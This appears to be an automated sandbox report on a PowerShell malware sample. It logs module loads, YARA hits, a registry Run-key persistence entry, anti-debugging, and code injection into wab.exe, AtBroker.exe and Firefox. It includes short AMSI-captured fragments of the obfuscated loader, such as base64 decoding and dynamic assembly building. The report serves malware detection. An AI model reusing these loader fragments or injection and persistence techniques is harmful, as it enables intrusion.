Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptdlg.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptdlg.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior

Source: Yara match	File source: 00000005.00000002.2024745379.0000000009228000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2014092746.0000000005BA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2024565925.0000000008830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2349440816.000001C0B94F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Aktionsenhedens)$global:Lnningsdagen = [System.Text.Encoding]::ASCII.GetString($Headmen)$global:Renummereredes=$Lnningsdagen.substring(275390,26541)<#Avlingerne gatecrashers Kniplebr
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Undernomen $Ungovernedness $Ordlyd), (Hrespillet @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Kitningerne20 = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Stnkelapperne)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($halaaben, $false).DefineType($Bhutanernes,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Aktionsenhedens)$global:Lnningsdagen = [System.Text.Encoding]::ASCII.GetString($Headmen)$global:Renummereredes=$Lnningsdagen.substring(275390,26541)<#Avlingerne gatecrashers Kniplebr

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B8A6F87 push esp; retf	2_2_00007FFD9B8A6F88
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B8A8123 push ebx; ret	2_2_00007FFD9B8A816A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_077708D8 push eax; mov dword ptr [esp], ecx	5_2_07770AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07770AAC push eax; mov dword ptr [esp], ecx	5_2_07770AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23BD09AD push ecx; mov dword ptr [esp], ecx	10_2_23BD09B6

Source: C:\Windows\SysWOW64\AtBroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PX5H4			Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PX5H4			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5663	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4240	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7092	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2658	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3900	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5480	Thread sleep count: 7092 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6532	Thread sleep count: 2658 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6356	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 2076	Thread sleep time: -38000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe	Last function: Thread delayed

Source: wab.exe, 0000000A.00000002.2334979890.0000000007FD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2376883288.000001C0C181F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtUnmapViewOfSection: Direct from: 0x76F02D3C	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files (x86)\TEQyXgSnDatkngzhZOVCchQnHjnoGRgXuwOVmnmokOM\iqAcDmQSdyp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3000000			Jump to behavior
